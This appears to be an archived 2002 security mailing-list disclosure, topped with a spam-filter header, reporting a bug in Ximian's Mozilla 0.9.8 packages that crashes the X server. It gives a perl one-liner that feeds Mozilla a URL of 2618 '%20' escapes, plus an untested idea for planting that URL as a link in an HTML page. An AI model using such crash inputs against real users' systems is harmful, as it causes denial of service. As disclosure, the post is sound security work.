SPAM: -------------------- Start SpamAssassin results ---------------------- SPAM: This mail is probably spam. The original message has been altered SPAM: so you can recognise or block similar unwanted mail in future. SPAM: See http://spamassassin.org/tag/ for more details. SPAM: SPAM: Content analysis details: (5.8 hits, 5 required) SPAM: Hit! (4 points) BODY: Uses %-escapes inside a URL's hostname SPAM: Hit! (1.8 points) No MX records for the From: domain SPAM: SPAM: -------------------- End of SpamAssassin results --------------------- NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't make it since this doesn't seem to affect a redhat itself, it affects the mozilla packages distrbuted by Ximian: The test system look like: bash#~ rpm -qa | grep mozilla mozilla-0.9.8-1.ximian.2 mozilla-mail-0.9.8-1.ximian.2 mozilla-xmlterm-0.9.8-1.ximian.2 mozilla-devel-0.9.8-1.ximian.2 nautilus-mozilla-1.0.6-ximian.4 mozilla-psm-0.9.8-1.ximian.2 kdebindings-kmozilla-2.1.1-1 This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the the updates). There is a bug in mozilla 0.9.8-1 which allows you to Crash the X server. I won't go into details I'll just show the proof of concept. exploit: Local: bash#~ mozilla `perl -e "print '%20' x 2618"` Remote: I haven't test this but i guess: echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >> ./attack.html perhaps using "img src" or java script... Best Regards -- /* Rodrigo Gutierrez <rodrigoat_private> Trustix AS http://www.trustix.com */
This archive was generated by hypermail 2b30 : Sun Feb 17 2002 - 09:08:15 PST